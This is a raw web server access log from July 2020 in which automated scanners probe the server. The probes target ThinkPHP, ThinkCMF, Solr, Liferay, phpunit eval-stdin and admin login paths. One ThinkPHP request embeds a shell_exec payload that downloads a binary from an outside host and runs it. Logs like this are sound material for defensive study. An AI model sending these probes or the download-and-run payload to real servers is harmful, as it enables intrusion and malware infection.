80.82.70.140 - - [01/Jul/2020:01:38:57 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.80:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
114.32.140.251 - - [01/Jul/2020:01:39:19 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
45.92.126.74 - - [01/Jul/2020:01:41:22 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
45.92.126.74 - - [01/Jul/2020:01:41:33 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
45.92.126.74 - - [01/Jul/2020:01:41:45 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
45.92.126.74 - - [01/Jul/2020:01:41:56 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
211.22.182.136 - - [01/Jul/2020:01:47:35 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
80.82.70.140 - - [01/Jul/2020:01:48:12 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.81:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
80.82.70.140 - - [01/Jul/2020:01:50:47 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.85:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
45.201.173.95 - - [01/Jul/2020:01:53:13 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
80.82.70.140 - - [01/Jul/2020:01:59:51 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.86:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
78.142.33.41 - - [01/Jul/2020:02:01:31 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
80.82.70.140 - - [01/Jul/2020:02:02:13 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.89:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
122.116.93.108 - - [01/Jul/2020:02:06:09 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
80.82.70.140 - - [01/Jul/2020:02:09:09 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.87:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
220.132.94.251 - - [01/Jul/2020:02:10:24 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
45.175.146.125 - - [01/Jul/2020:02:11:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:12:16 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:12:26 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:12:36 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:12:41 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:12:46 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:12:48 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:12:57 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:12:57 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:12:59 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:13:08 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:13:08 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:13:09 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:13:11 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:13:13 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:13:16 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:13:20 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:13:21 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:13:25 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:13:33 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.39.11.105 - - [01/Jul/2020:02:13:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
195.54.160.135 - - [01/Jul/2020:02:13:38 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
71.6.232.4 - - [01/Jul/2020:02:14:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:15:49 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:16:41 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:16:46 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:17:01 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:17:22 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
80.82.70.140 - - [01/Jul/2020:02:18:04 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.82:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
195.54.160.135 - - [01/Jul/2020:02:23:57 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
80.82.70.140 - - [01/Jul/2020:02:24:52 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.85:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
195.54.160.135 - - [01/Jul/2020:02:25:24 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:25:36 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:25:45 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:26:13 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:26:53 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:27:12 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:27:22 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
80.82.70.140 - - [01/Jul/2020:02:27:41 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.86:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
195.54.160.135 - - [01/Jul/2020:02:27:53 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [01/Jul/2020:02:28:37 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
88.87.70.65 - - [01/Jul/2020:02:34:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
220.133.135.80 - - [01/Jul/2020:02:35:04 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
191.97.1.195 - - [01/Jul/2020:02:37:23 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
201.217.155.180 - - [01/Jul/2020:02:38:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
201.217.155.180 - - [01/Jul/2020:02:38:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
201.217.155.180 - - [01/Jul/2020:02:38:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
201.217.155.180 - - [01/Jul/2020:02:38:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
201.217.155.180 - - [01/Jul/2020:02:38:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
201.217.155.180 - - [01/Jul/2020:02:38:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
201.217.155.180 - - [01/Jul/2020:02:38:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
201.217.155.180 - - [01/Jul/2020:02:38:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
201.217.155.180 - - [01/Jul/2020:02:38:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
201.217.155.180 - - [01/Jul/2020:02:38:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
128.14.209.226 - - [01/Jul/2020:02:38:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.39.11.105 - - [01/Jul/2020:02:39:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
80.82.70.140 - - [01/Jul/2020:02:40:06 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.81:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
193.118.53.210 - - [01/Jul/2020:02:45:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
13.57.192.89 - - [01/Jul/2020:02:50:13 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
80.82.70.140 - - [01/Jul/2020:02:58:33 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.84:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
196.52.43.92 - - [01/Jul/2020:03:00:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36"
148.71.44.68 - - [01/Jul/2020:03:03:55 +0200] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://scan.casualaffinity.net/x05010/888fff999.x86 -O .d41 ; chmod 777 .d41 ; ./.d41 ThinkPHP.exploit' HTTP/1.1" 404 310 "-" "Unstable/2.0"
61.160.236.86 - - [01/Jul/2020:03:04:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
61.160.236.86 - - [01/Jul/2020:03:04:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
61.160.236.86 - - [01/Jul/2020:03:04:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
61.160.236.86 - - [01/Jul/2020:03:04:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
61.160.236.86 - - [01/Jul/2020:03:04:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
61.160.236.86 - - [01/Jul/2020:03:04:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
61.160.236.86 - - [01/Jul/2020:03:04:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
61.160.236.86 - - [01/Jul/2020:03:04:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
61.160.236.86 - - [01/Jul/2020:03:04:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
61.160.236.86 - - [01/Jul/2020:03:04:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.70.140 - - [01/Jul/2020:03:04:46 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.83:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
188.165.194.136 - - [01/Jul/2020:03:05:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.165.194.136 - - [01/Jul/2020:03:05:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.165.194.136 - - [01/Jul/2020:03:05:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.165.194.136 - - [01/Jul/2020:03:05:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.165.194.136 - - [01/Jul/2020:03:05:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.165.194.136 - - [01/Jul/2020:03:05:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.165.194.136 - - [01/Jul/2020:03:05:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.165.194.136 - - [01/Jul/2020:03:05:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.165.194.136 - - [01/Jul/2020:03:05:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.165.194.136 - - [01/Jul/2020:03:05:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.187.79.208 - - [01/Jul/2020:03:08:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
185.39.11.105 - - [01/Jul/2020:03:09:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
59.127.4.44 - - [01/Jul/2020:03:11:27 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
185.39.11.105 - - [01/Jul/2020:03:16:57 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
193.118.55.146 - - [01/Jul/2020:03:19:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
80.82.70.140 - - [01/Jul/2020:03:20:13 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.80:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
80.82.70.140 - - [01/Jul/2020:03:20:28 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.89:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
220.134.152.251 - - [01/Jul/2020:03:24:35 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
71.6.232.4 - - [01/Jul/2020:03:25:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
185.39.11.105 - - [01/Jul/2020:03:25:28 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
150.109.167.106 - - [01/Jul/2020:03:26:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
150.109.167.106 - - [01/Jul/2020:03:26:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
118.25.59.28 - - [01/Jul/2020:03:29:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
129.144.27.163 - - [01/Jul/2020:03:31:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.27.163 - - [01/Jul/2020:03:31:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.27.163 - - [01/Jul/2020:03:31:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.27.163 - - [01/Jul/2020:03:31:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.27.163 - - [01/Jul/2020:03:31:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.27.163 - - [01/Jul/2020:03:31:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.27.163 - - [01/Jul/2020:03:31:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.27.163 - - [01/Jul/2020:03:31:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.27.163 - - [01/Jul/2020:03:31:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.27.163 - - [01/Jul/2020:03:31:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
193.118.53.194 - - [01/Jul/2020:03:35:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
116.72.128.65 - - [01/Jul/2020:03:36:49 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
49.65.201.186 - - [01/Jul/2020:03:37:54 +0200] "GET /phpmyadmin/ HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
80.82.70.140 - - [01/Jul/2020:03:38:05 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.82:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
185.39.11.105 - - [01/Jul/2020:03:41:02 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
185.39.11.105 - - [01/Jul/2020:03:43:18 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
74.102.39.43 - - [01/Jul/2020:03:45:28 +0200] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 325 "-" "XTC"
220.133.33.251 - - [01/Jul/2020:04:00:29 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
73.46.243.234 - - [01/Jul/2020:04:02:24 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
80.82.70.140 - - [01/Jul/2020:04:04:32 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.83:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
85.25.91.142 - - [01/Jul/2020:04:08:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.25.91.142 - - [01/Jul/2020:04:08:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.25.91.142 - - [01/Jul/2020:04:08:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.25.91.142 - - [01/Jul/2020:04:08:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.25.91.142 - - [01/Jul/2020:04:08:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.25.91.142 - - [01/Jul/2020:04:08:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.25.91.142 - - [01/Jul/2020:04:08:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.25.91.142 - - [01/Jul/2020:04:08:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.25.91.142 - - [01/Jul/2020:04:08:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
85.25.91.142 - - [01/Jul/2020:04:08:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
196.52.43.55 - - [01/Jul/2020:04:12:39 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36"
186.148.166.146 - - [01/Jul/2020:04:12:39 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
71.6.232.4 - - [01/Jul/2020:04:14:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
178.212.64.51 - - [01/Jul/2020:04:17:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
192.241.227.232 - - [01/Jul/2020:04:17:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.191.174.36 - - [01/Jul/2020:04:18:32 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
192.241.227.232 - - [01/Jul/2020:04:19:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
114.35.119.204 - - [01/Jul/2020:04:20:19 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
122.117.109.20 - - [01/Jul/2020:04:21:13 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
122.117.109.20 - - [01/Jul/2020:04:21:26 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
192.241.227.232 - - [01/Jul/2020:04:21:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.227.232 - - [01/Jul/2020:04:22:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
122.117.109.20 - - [01/Jul/2020:04:22:02 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
18.236.252.27 - - [01/Jul/2020:04:22:02 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
114.33.49.230 - - [01/Jul/2020:04:22:26 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
192.241.227.232 - - [01/Jul/2020:04:23:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.227.232 - - [01/Jul/2020:04:24:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
